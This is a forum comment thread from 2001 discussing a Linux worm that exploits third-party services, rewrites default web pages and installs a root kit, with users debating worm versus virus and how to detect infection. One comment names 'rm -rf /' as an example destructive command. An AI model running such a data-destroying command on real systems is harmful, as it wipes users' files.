    Or is it just negative news about a pet issue, getting swept into a little dark corner at the end of something else?

  • However, that's a lot for 100 Megs of stuff. A CD would STILL be very useful.
  • I read your write up. Interesting stuff there. My question is how do I determine if a system has been hit? Are there telltale log entries or will netstat show unusual connections?
  • There goes the assertion/urban myth that Linux was proof against virii and such.
    A "worm" isn't a virus. A virus is a hidden executable that spreads within a computer. A worm is a script or program that hits a computer and then goes to other computers. All this is is a script that attacks network services, sends an email and then looks for other computers. There is a difference.

    SealBeater
  • the person who successfully hacks a system can win $50,000 while in an unrelated contest the person who can track down a hacker wins a copy of McGraw-Hill's Hacking Exposed, a $28 value?

  • Maybe because it's really two third party software and not linux (the kernel) that's the cause of the vulnerability?

    Maybe because patches have been available BEFORE this worm even came into existence?

    Just a few thoughts... Don't get me wrong, this stuff is bad but it's hard for me to get as excited about it than I have been about the MS bugs.
  • by Masem ( 1171 ) on Wednesday January 17, 2001 @10:45AM (#500745)
    It's being said that it isn't that bad because it doesn't destroy data itself, it merely unloads codes and tries to find more sites to unload more codes.

    But reading the advisories, it suggests that the unloaded code not only is a standard script kiddie root pack, but also emails to some sites, most likely the information on how the box reporting can be further hacked. It can tie up your internet connection since the portscanning that it appears to be doing is rapid. It also rewrites the default index page of the server (assuming you use default installs) with that "powered by raman noodles" page.

    Which means that if you have this on your system, the only precaution you can take is a full system reinstall least you be "0wn3d" in the future, because some script kiddie somewhere has a way into root on your box.

    So this is VERY dangerous as there's a potental for abuse, but that has to be initiated by a human contact, which downgrades this from a virus to a worm. As others have said, if the rootpack had a simple "rm -rf /" or similarly damaging command in it's script, it would be a virus.

Always leave room to add an explanation if it doesn't work out.

Working...